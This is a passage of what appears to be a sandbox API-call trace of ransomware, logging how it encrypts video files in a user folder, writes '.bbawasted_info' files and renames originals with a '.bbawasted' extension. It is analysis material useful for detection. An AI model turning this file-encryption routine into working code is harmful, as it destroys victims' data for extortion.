pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.467] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.476] SetEndOfFile (hFile=0x11c) returned 1 [0076.478] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.478] CloseHandle (hObject=0x11c) returned 1 [0076.479] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5abe80 | out: hHeap=0x580000) returned 1 [0076.479] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.480] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.480] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Fcs1wOjY-VK27u.mp4") returned 59 [0076.480] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x280) returned 0x5bf070 [0076.480] lstrcpyW (in: lpString1=0x5bf0e6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.480] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.480] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.481] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.481] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Fcs1wOjY-VK27u.mp4.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fcs1wojy-vk27u.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.482] WriteFile (in: hFile=0x11c, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.482] SetEndOfFile (hFile=0x11c) returned 1 [0076.483] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.483] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.483] lstrcpyW (in: lpString1=0x5bf0e6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Fcs1wOjY-VK27u.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fcs1wojy-vk27u.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Fcs1wOjY-VK27u.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fcs1wojy-vk27u.mp4.bbawasted")) returned 1 [0076.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Fcs1wOjY-VK27u.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fcs1wojy-vk27u.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.484] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.486] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0076.487] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.487] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.487] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0076.487] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.487] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.543] SetEndOfFile (hFile=0x11c) returned 1 [0076.545] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.545] CloseHandle (hObject=0x11c) returned 1 [0076.548] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0076.548] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.549] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.549] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JH 5_.mp4") returned 50 [0076.549] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26e) returned 0x5bf070 [0076.549] lstrcpyW (in: lpString1=0x5bf0d4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.549] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.549] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.550] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.550] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JH 5_.mp4.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jh 5_.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.550] WriteFile (in: hFile=0x11c, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.552] SetEndOfFile (hFile=0x11c) returned 1 [0076.552] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.552] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.552] lstrcpyW (in: lpString1=0x5bf0d4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JH 5_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jh 5_.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JH 5_.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jh 5_.mp4.bbawasted")) returned 1 [0076.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\JH 5_.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jh 5_.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.553] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.554] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0076.555] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.555] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.555] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0076.556] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.556] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.564] SetEndOfFile (hFile=0x11c) returned 1 [0076.566] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.566] CloseHandle (hObject=0x11c) returned 1 [0076.614] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0076.614] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.615] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.615] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ncxW_ryX6cuTNNdlUL8x.mp4") returned 65 [0076.615] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28c) returned 0x5bf070 [0076.615] lstrcpyW (in: lpString1=0x5bf0f2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.615] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.615] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.616] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.616] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ncxW_ryX6cuTNNdlUL8x.mp4.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ncxw_ryx6cutnndlul8x.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.616] WriteFile (in: hFile=0x11c, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.617] SetEndOfFile (hFile=0x11c) returned 1 [0076.617] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.617] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.617] lstrcpyW (in: lpString1=0x5bf0f2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ncxW_ryX6cuTNNdlUL8x.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ncxw_ryx6cutnndlul8x.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ncxW_ryX6cuTNNdlUL8x.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ncxw_ryx6cutnndlul8x.mp4.bbawasted")) returned 1 [0076.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ncxW_ryX6cuTNNdlUL8x.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ncxw_ryx6cutnndlul8x.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.618] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.619] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0076.620] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0076.620] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.620] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0076.621] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.621] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.629] SetEndOfFile (hFile=0x11c) returned 1 [0076.631] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.631] CloseHandle (hObject=0x11c) returned 1 [0076.633] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0076.633] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.634] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.634] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qgHneit3js.mkv") returned 55 [0076.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x278) returned 0x5bf070 [0076.634] lstrcpyW (in: lpString1=0x5bf0de, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.634] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.634] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.635] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.635] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qgHneit3js.mkv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qghneit3js.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.635] WriteFile (in: hFile=0x11c, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.636] SetEndOfFile (hFile=0x11c) returned 1 [0076.637] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.637] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.637] lstrcpyW (in: lpString1=0x5bf0de, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.637] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qgHneit3js.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qghneit3js.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qgHneit3js.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qghneit3js.mkv.bbawasted")) returned 1 [0076.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qgHneit3js.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qghneit3js.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.638] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.640] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0076.641] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5d29d8 | out: pbBuffer=0x5d29d8) returned 1 [0076.641] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.641] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0076.641] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.642] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.651] SetEndOfFile (hFile=0x11c) returned 1 [0076.653] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.653] CloseHandle (hObject=0x11c) returned 1 [0076.654] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0076.654] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.655] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.655] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.655] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\6qaQ.flv") returned 70 [0076.655] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x296) returned 0x5bf070 [0076.655] lstrcpyW (in: lpString1=0x5bf0fc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.655] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.655] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.656] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.656] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\6qaQ.flv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\6qaq.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.657] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.658] SetEndOfFile (hFile=0x11c) returned 1 [0076.658] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.658] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.658] lstrcpyW (in: lpString1=0x5bf0fc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\6qaQ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\6qaq.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\6qaQ.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\6qaq.flv.bbawasted")) returned 1 [0076.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\6qaQ.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\6qaq.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.756] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.759] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0076.760] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0076.760] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.761] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0076.761] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.762] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.772] SetEndOfFile (hFile=0x11c) returned 1 [0076.775] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.775] CloseHandle (hObject=0x11c) returned 1 [0076.777] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0076.777] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.778] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.778] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\Cd6zVLtrJcMgy.swf") returned 79 [0076.778] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a8) returned 0x5d2c48 [0076.778] lstrcpyW (in: lpString1=0x5d2ce6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.778] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.778] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.779] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.779] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\Cd6zVLtrJcMgy.swf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\cd6zvltrjcmgy.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.780] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.781] SetEndOfFile (hFile=0x11c) returned 1 [0076.781] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.782] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.782] lstrcpyW (in: lpString1=0x5d2ce6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.782] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\Cd6zVLtrJcMgy.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\cd6zvltrjcmgy.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\Cd6zVLtrJcMgy.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\cd6zvltrjcmgy.swf.bbawasted")) returned 